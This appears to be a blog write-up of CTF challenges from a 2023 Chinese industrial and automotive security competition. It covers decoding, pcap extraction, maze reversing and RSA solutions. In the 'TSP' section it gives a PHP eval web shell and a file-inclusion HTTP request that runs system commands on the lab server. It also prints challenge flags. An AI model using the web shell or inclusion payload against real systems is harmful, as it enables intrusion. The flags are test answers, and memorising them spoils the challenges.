2023工业信息安全技能大赛—鹏城锦标赛 WriteUp

汽车-Crypto

img

结果进行【键盘密码】解密即可

工控-Welcome

img

base64解密即可

工控-Easy Ping

img

将所有ICMP.data包长度len做hex+base64

汽车-ECU_Upgrade

img

img

img

img

img

img

img

img

工控-ezRansomware

img

img

AES解密得到flag

汽车-reverse

按编码直接填上参数 831486 25 tboxcloud

汽车-TSP

上传马 <script language='php'>@eval($_POST['cmd']);</script>

文件包含

POST /index.php?file=uploads/check.jpg HTTP/1.1
Host: 172.10.0.8:9999
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 23
Content-Type: application/x-www-form-urlencoded

cmd=system('cat /fl*');

解码,加转编码。

fla=E5=90=89=7Bflnmyzl=E4=B8=83gs=E5=85=ABt=E4=B8=89haa=E5=85=ABkwjch=E5=9B=
=9Bg=E4=BA=94bb0=E4=B8=83=E4=B8=80=E6=AF=94=E5=85=ABe=E4=B8=89bd=E4=BA=8C=E9=
=9B=B6=E5=9B=9BdR=E5=85=ADylUx=E9=9B=B6Hcus=7Dfla=E5=90=89=7Bflnmyzl=E4=B8=83gs=E5=85=ABt=E4=B8=89haa=E5=85=ABkwjch=E5=9B=
=9Bg=E4=BA=94bb0=E4=B8=83=E4=B8=80=E6=AF=94=E5=85=ABe=E4=B8=89bd=E4=BA=8C=E9=
=9B=B6=E5=9B=9BdR=E5=85=ADylUx=E9=9B=B6Hcus=7D

cyberchef解码再转utf8

fla吉{flnmyzl七gs八t三haa八kwjch四g五bb0七一比八e三bd二零四dR六ylUx零Hcus}fla吉{flnmyzl七gs八t三haa八kwjch四g五bb0七一比八e三bd二零四dR六ylUx零Hcus}
flag{flnmyzl7gs8t3haa8kwjch4g5bb071b8e3bd204dR6ylUx0Hcus}

汽车-PYC

import base64, time


def encode1(ans):
    s = ''
    for i in ans:
        x = ord(i) ^ 73
        x = x + 37
        s += chr(x)

    return s


def decode1(ans):
    s = ''
    for i in ans:
        x = ord(i) - 37
        x = x ^ 73
        s += chr(x)

    return s


def encode2(ans):
    s = ''
    for i in ans:
        x = ord(i) + 37
        x = x ^ 37
        s += chr(x)

    return s


def decode2(ans):
    s = ''
    for i in ans:
        x = ord(i) ^ 37
        x = x - 37
        s += chr(x)

    return s


def encode3(ans):
    return base64.b32encode(ans)

def decode3(ans):
    return base64.b32decode(ans)


flag = ' '
print
# 'Please Input the flag which you had find:'
# flag = raw_input()
final = 'KGRFYWPN43TE5FXG5SLOA7EWPRZJNZXHS3TODFXG4KLONYUW43TFW==='
res = decode1(decode2(decode3(final)))
print res

工控-Maze

过滤 (ip.src == 192.168.40.199 && ip.dst == 192.168.40.41) && (tcp.flags.push == 1) 提出出tcp 数据.保存为7z文件。然后正常逆向迷宫。

tshark -r a.pcapng -Y "(ip.src == 192.168.40.199 && ip.dst == 192.168.40.41) && (tcp.flags.push == 1)" -T fields -e tcp.payload > out5.txt

根据条件进行判断

W右 K左1 B右2 H下1 V上2 M下2

     switch ( v17[(_DWORD)StrI] )
      {
        case 'B':
          v8 = coll + 2;
          goto LABEL_18;
        case 'H':
          ++v5;
          bound += 10;
          ++step;
          if ( v5 < 1 )
            goto Wrongg;
          v9 = v5 <= 8;
          goto LABEL_20;
        case 'K':
          v8 = coll - 1;
          goto LABEL_18;
        case 'M':
          v5 += 2;
          bound += 20;
          ++step;
          if ( v5 < 1 )
            goto Wrongg;
          v9 = v5 <= 8;
          goto LABEL_20;
        case 'P':
          v8 = coll - 2;
          goto LABEL_18;
        case 'Q':
          --v5;
          bound -= 10;
          ++step;
          if ( v5 < 1 )
            goto Wrongg;
          v9 = v5 <= 8;
          goto LABEL_20;
        case 'V':
          v5 -= 2;
          bound -= 20;
          ++step;
          if ( v5 < 1 )
            goto Wrongg;
          v9 = v5 <= 8;
          goto LABEL_20;
        case 'W':
          v8 = coll + 1;

if ( step > 12 || v5 != 8 || v8 != 8 )
            goto Wrongg;
          v10 = output(std::cout, "Congratulations!");// sucess
          std::ostream::operator<<(v10, out);
          // 行8 列8 不大于12步.完成

1 WMKMBHBVBMWM arr:BHKMPQVW

1, 1, 1, 1, 1, 1, 1, 1, 1, 1
1, 0, 0, 1, 0, 0, 0, 1, 0, 1
1, 1, 0, 1, 0, 0, 0, 1, 0, 1
1, 0, 0, 0, 0, 1, 1, 0, 0, 1
1, 0, 1, 1, 1, 0, 0, 0, 0, 1
1, 0, 0, 0, 1, 0, 1, 0, 1, 1
1, 0, 1, 0, 0, 0, 1, 0, 0, 1
1, 0, 1, 1, 1, 1, 1, 1, 0, 1
1, 1, 0, 0, 0, 0, 0, 0, 0, 1
1, 1, 1, 1, 1, 1, 1, 1, 1, 1

汽车-CanRSA | 不确定。

16进制解码得到。

---BEGIN PUBLIC KEY-----
MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKBgQKP/53T5v6XgWSet/5ekwPP
aWNHxBELxLo5afCxFmmEDFHYGmhCtt8rCQ8hzXbUNxqMDkcEjJZeyltGkTr7uNoF
IHKgVm1wOcYYq6kGV1mwWeKeSF3FBhoWrGMSlDjZNU5l31dHVGuF2z1pmBnEt3Mt
+SfHCEpdUtbm1qrBRGI0JQKBgQH4+6QQBS337aNGLxqs1p5AdgQzyjNXZ81zBaPQ
kIBaX9QF3W7qcOmPDKHhzyVHSGcb8MmABsIO7h1ieQQ1Cf56mCOLQ5FgpWEtpx6Q
RRToEoBhfjB8PNM}.6TG/KM}.dBEH7sY2DyvS9Rva5KXqAoULdab8aNXzLXkwgC2
2Q8Vow==
-----END PUBLIC KEY-----

有 }. 非base64字符。。搜 MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKBgQKP/53T5v6XgWSet/5ekwPP 找到
https://github.com/RsaCtfTool/RsaCtfTool/issues/226

-----BEGIN PUBLIC KEY-----
MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKBgQKP/53T5v6XgWSet/5ekwPP
aWNHxBELxLo5afCxFmmEDFHYGmhCtt8rCQ8hzXbUNxqMDkcEjJZeyltGkTr7uNoF
IHKgVm1wOcYYq6kGV1mwWeKeSF3FBhoWrGMSlDjZNU5l31dHVGuF2z1pmBnEt3Mt
+SfHCEpdUtbm1qrBRGI0JQKBgQH4+6QQBS337aNGLxqs1p5AdgQzyjNXZ81zBaPQ
kIBaX9QF3W7qcOmPDKHhzyVHSGcb8MmABsIO7h1ieQQ1Cf56mCOLQ5FgpWEtpx6Q
RRToEoBhfjB8PNMxP6TG/KMxWdBEH7sY2DyvS9Rva5KXqAoULdab8aNXzLXkwgC2
2Q8Vow==
-----END PUBLIC KEY-----

解得ne。

import gmpy2
from Crypto.Util.number import long_to_bytes

n = 460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597
e = 354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619
p = 15991846970993213322072626901560749932686325766403404864023341810735319249066370916090640926219079368845510444031400322229147771682961132420481897362843199
q = 28805791771260259486856902729020438686670354441296247148207862836064657849735343618207098163901787287368569768472521344635567334299356760080507454640207003
phin = (p - 1) * (q - 1)
d = gmpy2.invert(e, phin)
c = 49204714858589959506425439175649050431712689077552080337419353493097408019421214668787900602380476464749282877075822584378756221224722944848685142270406954588911362016685713099949058708493084032575436033859064998703946175169856560687276793237892152502134788316092552043085946089668969326209343517732349235471

m = pow(c, d, n)
print(long_to_bytes(m))
# b'fk32mhjlyr9pfamg97999c6b07a8ce82Hds5XEUIqFw8ZR4NLM0lPjtBGT3cDJhmen'

不确定对不对。

posted @ 2023-10-16 16:26  wgf4242  阅读(715)  评论(1编辑  收藏  举报